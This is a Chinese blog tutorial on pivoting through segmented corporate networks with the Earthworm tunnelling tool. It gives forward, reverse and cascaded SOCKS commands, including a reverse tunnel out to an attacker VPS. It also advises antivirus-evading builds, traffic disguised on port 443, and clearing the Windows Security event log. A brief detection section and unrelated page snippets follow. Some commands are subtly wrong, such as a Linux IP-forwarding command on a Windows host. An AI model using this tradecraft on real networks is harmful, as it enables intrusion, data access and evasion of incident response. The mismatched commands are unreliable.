news 2026/4/17 10:38:49

【实战演练】从零构建多层内网隧道:Earthworm(EW)穿透复杂网络拓扑

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【实战演练】从零构建多层内网隧道:Earthworm(EW)穿透复杂网络拓扑

1. 认识Earthworm:内网穿透的瑞士军刀

第一次接触Earthworm(简称EW)是在三年前的一次企业安全评估项目中。当时客户的内网结构极其复杂,整整花了三天时间都没能突破DMZ区的限制。直到团队里一位前辈扔给我这个不到2MB的绿色小工具,局面才彻底扭转——它就像一把锋利的手术刀,精准切开层层网络隔离。

EW本质上是一个轻量级端口转发与SOCKS代理工具,用C语言编写,支持Windows/Linux/Mac多平台运行。与同类工具相比,它的核心优势在于模块化设计:6种工作模式(ssocksd/rcsocks/rssocks/lcx_slave/lcx_listen/lcx_tran)可以像乐高积木一样自由组合,适应各种网络拓扑。我常把它比作"网络拓扑变形金刚"——根据不同的网络限制条件,灵活切换正向连接、反向连接或多级级联模式。

举个例子,去年某次金融行业渗透测试中,目标系统采用"堡垒机+双网卡"的架构。我们先用ssocksd模式穿透第一层防火墙,再通过lcx_slave将流量跳转到核心交易区,最终用rssocks反弹出数据。整个过程就像玩俄罗斯套娃,一层层揭开内网的面纱。

2. 实战环境搭建:模拟企业级网络拓扑

为了让大家更直观理解EW的威力,我特意在本地搭建了一个三级隔离网络实验环境。这个拓扑模拟了典型企业的网络架构:

  • DMZ区(192.168.1.0/24):部署Web服务器(192.168.1.100),对外开放80端口
  • 办公区(10.10.1.0/24):域控制器、文件服务器等,仅允许DMZ区特定IP访问
  • 生产区(172.16.1.0/24):数据库、ERP系统,与办公区通过防火墙策略隔离

实验设备清单如下:

角色操作系统IP地址网络位置
攻击机Kali Linux192.168.100.50外网
跳板机Windows 2012192.168.1.100/10.10.1.10DMZ+办公区
数据库服务器CentOS 7172.16.1.100生产区

关键配置细节

  1. 在跳板机上启用IP转发:
    echo 1 > /proc/sys/net/ipv4/ip_forward
  2. 生产区防火墙只放行办公区特定IP的3306端口:
    iptables -A INPUT -p tcp -s 10.10.1.10 --dport 3306 -j ACCEPT
  3. 在Windows系统上关闭防火墙(实验环境):
    netsh advfirewall set allprofiles state off

3. 正向穿透:单层网络突破术

当目标服务器有公网IP时,ssocksd模式就是最简单的突破口。这就像给内网开了个后门——我们在受控服务器上启动SOCKS代理服务,攻击机直接连接即可。

具体操作流程:

  1. 上传ew_for_Win.exe到跳板机(192.168.1.100)

  2. 启动正向代理服务:

    ew_for_Win.exe -s ssocksd -l 1080

    此时跳板机会监听1080端口,将本机变成SOCKS5代理服务器

  3. 在攻击机上配置Proxifier(或其他代理工具):

    • 代理类型:SOCKS5
    • 地址:192.168.1.100
    • 端口:1080
  4. 测试连接办公区资源:

    proxychains nmap -sT -Pn 10.10.1.0/24

踩坑记录

  • 遇到连接超时?试试在EW命令行界面敲回车唤醒连接
  • Windows Server 2012可能需要关闭增强安全配置
  • 企业环境常遇到杀软拦截,建议使用免杀版本或自定义编译

4. 反向穿透:无公网IP的突围战

90%的企业内网服务器都没有公网IP,这时候就需要rcsocks+rssocks组合拳。这种模式的神奇之处在于:让内网服务器主动外连我们的VPS,就像特工主动联系总部。

实战案例演示:

  1. 在公网VPS(假设IP为203.0.113.1)启动接收端:

    ./ew_for_linux -s rcsocks -l 1080 -e 8888

    这条命令开启两个端口:1080(代理出口)和8888(等待内网连接)

  2. 在内网跳板机执行反弹:

    ew_for_Win.exe -s rssocks -d 203.0.113.1 -e 8888

    此时内网流量会通过8888端口隧道传输到VPS的1080端口

  3. 本地连接VPS的1080端口即可访问内网:

    curl --socks5 203.0.113.1:1080 http://10.10.1.10

高阶技巧

  • 配合lcx_tran可实现端口映射,比如将内网3389映射到VPS:
    ew_for_Win.exe -s lcx_tran -l 3389 -f 10.10.1.10 -g 3389
  • 使用-t参数调整超时时间,避免长连接中断
  • 加密隧道:建议配合Stowaway等工具进行流量加密

5. 多级穿透:纵深网络的破解之道

遇到银行级的多层隔离网络时,就需要三级级联战术。去年某次攻防演练中,我们就用这个方法突破了"互联网-DMZ-办公网-核心区"的四层防御。

典型操作流程:

  1. VPS(L1)启动流量接收:

    ./ew -s rcsocks -l 1080 -e 8888
  2. 第一跳板机(L2)连接VPS并转发:

    ew_for_Win.exe -s lcx_slave -d 203.0.113.1 -e 8888 -f 172.16.1.100 -g 9999
  3. 第二跳板机(L3)启动本地代理:

    ./ew_for_linux -s ssocksd -l 9999
  4. 最终通过VPS的1080端口访问核心区:

    proxychains mysql -h172.16.1.100 -uroot -p

网络拓扑示意图

[攻击机] ←SOCKS5→ [VPS:1080] ↑ [L2跳板机] ↑ [L3跳板机] ←→ [核心数据库]

6. 企业级对抗:隐蔽性与稳定性优化

在真实攻防中,粗暴的端口转发很容易触发安全告警。经过多次实战,我总结出这些企业环境生存法则

  1. 流量伪装

    • 修改EW默认的banner信息
    • 使用80/443等常见业务端口
    ew_for_Win.exe -s ssocksd -l 443
  2. 心跳保持

    while true; do curl --socks5 127.0.0.1:1080 http://baidu.com; sleep 60; done
  3. 多链路备份: 同时建立正向+反向隧道,主备切换:

    # 主链路 ./ew -s lcx_tran -l 3306 -f 172.16.1.100 -g 3306 # 备用链路 ./ew -s rssocks -d 203.0.113.1 -e 8888
  4. 日志擦除(Windows):

    Clear-EventLog -LogName Security

7. 防御视角:如何检测EW活动

作为蓝军成员时,我经常用这些方法揪出内网的EW隧道:

  1. 网络层检测

    netstat -ano | findstr "8888|1080|9999"
  2. 进程特征识别

    Get-Process | Where-Object {$_.Path -like "*ew*"}
  3. 流量特征分析

    • 固定心跳周期的SOCKS5握手包
    • 非标准端口上的持久连接
  4. 主机层监控

    # Linux检查加载模块 lsmod | grep lcx # Windows检查服务 sc query | findstr "Earthworm"

在一次金融行业攻防演练中,甲方安全团队就是通过NetFlow分析发现我们某个跳板机的流量周期特征,最终溯源到VPS。这提醒我们:真正的企业级渗透,稳定性比速度更重要。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/17 10:38:49

3步解锁加密音乐:完全免费的浏览器音频转换工具终极指南

3步解锁加密音乐:完全免费的浏览器音频转换工具终极指南 【免费下载链接】unlock-music 在浏览器中解锁加密的音乐文件。原仓库: 1. https://github.com/unlock-music/unlock-music ;2. https://git.unlock-music.dev/um/web 项目地址: htt…

作者头像 李华
网站建设 2026/4/17 10:37:33

从BIOS到UEFI:EFI分区与.efi文件如何重塑现代计算机启动?

1. 从BIOS到UEFI:计算机启动的进化史 还记得十几年前给老电脑重装系统时,那个蓝底黄字的BIOS界面吗?那时候每次调整启动顺序都要用键盘方向键小心翼翼地操作,生怕按错一个键就得从头再来。如今新电脑开机时,你会看到一…

作者头像 李华
网站建设 2026/4/17 10:34:41

B站CC字幕一键下载转换工具:解放你的视频学习与创作效率

B站CC字幕一键下载转换工具:解放你的视频学习与创作效率 【免费下载链接】BiliBiliCCSubtitle 一个用于下载B站(哔哩哔哩)CC字幕及转换的工具; 项目地址: https://gitcode.com/gh_mirrors/bi/BiliBiliCCSubtitle 还在为B站视频没有字幕而烦恼吗?想…

作者头像 李华
网站建设 2026/4/17 10:34:14

华为无线网络实战:基于802.1X的企业级安全准入配置详解

1. 企业无线网络安全为何需要802.1X? 每次给企业部署无线网络时,老板们最常问的两个问题就是:"网速快不快"和"安不安全"。说实话,现在随便买个家用路由器都能跑满千兆,但企业级无线网络真正的价值…

作者头像 李华
网站建设 2026/4/17 10:30:50

GEO热潮:风口还是骗局?

当前市场绝大多数GEO服务商,技术逻辑根本不成立,纯属忽悠。技术支持:拓世网络开发技术部摘要生成式引擎优化(GEO)是当前热点,但经过严格推演发现:市场99%的GEO服务商,其宣称的技术逻…

作者头像 李华